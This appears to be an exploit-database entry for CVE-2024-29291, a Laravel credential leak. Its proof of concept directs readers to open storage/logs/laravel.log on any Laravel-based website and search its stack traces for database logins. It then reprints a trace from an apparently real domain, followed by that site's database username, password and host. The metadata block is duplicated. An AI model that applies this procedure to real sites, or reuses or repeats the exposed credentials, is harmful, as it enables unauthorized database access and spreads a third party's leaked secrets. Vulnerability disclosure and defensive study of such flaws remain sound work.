Laravel Framework 11 - Credential Leakage
Author: Huseein Amer
type: webapps
platform: php
port:
date_added: 2024-04-21
date_updated: 2024-04-21
verified: 0
codes: CVE-2024-29291
tags:
aliases:
screenshot_url:
application_url:
raw file: 52000.txt
type: webapps
platform: php
port:
date_added: 2024-04-21
date_updated: 2024-04-21
verified: 0
codes: CVE-2024-29291
tags:
aliases:
screenshot_url:
application_url:
raw file: 52000.txt
# Exploit Title: Laravel Framework 11 - Credential Leakage # Google Dork: N/A # Date: [2024-04-19] # Exploit Author: Huseein Amer # Vendor Homepage: [https://laravel.com/] # Software Link: N/A # Version: 8.* - 11.* (REQUIRED) # Tested on: [N/A] # CVE : CVE-2024-29291 Proof of concept: Go to any Laravel-based website and navigate to storage/logs/laravel.log. Open the file and search for "PDO->__construct('mysql:host=". The result: shell Copy code #0 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70): PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array) #1 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46): Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array) Credentials: Username: u429384055_jscv Password: Jaly$$a0p0p0p0 Host: sql1...
Copyright © 2024 Irfan TOOR all rights reserved.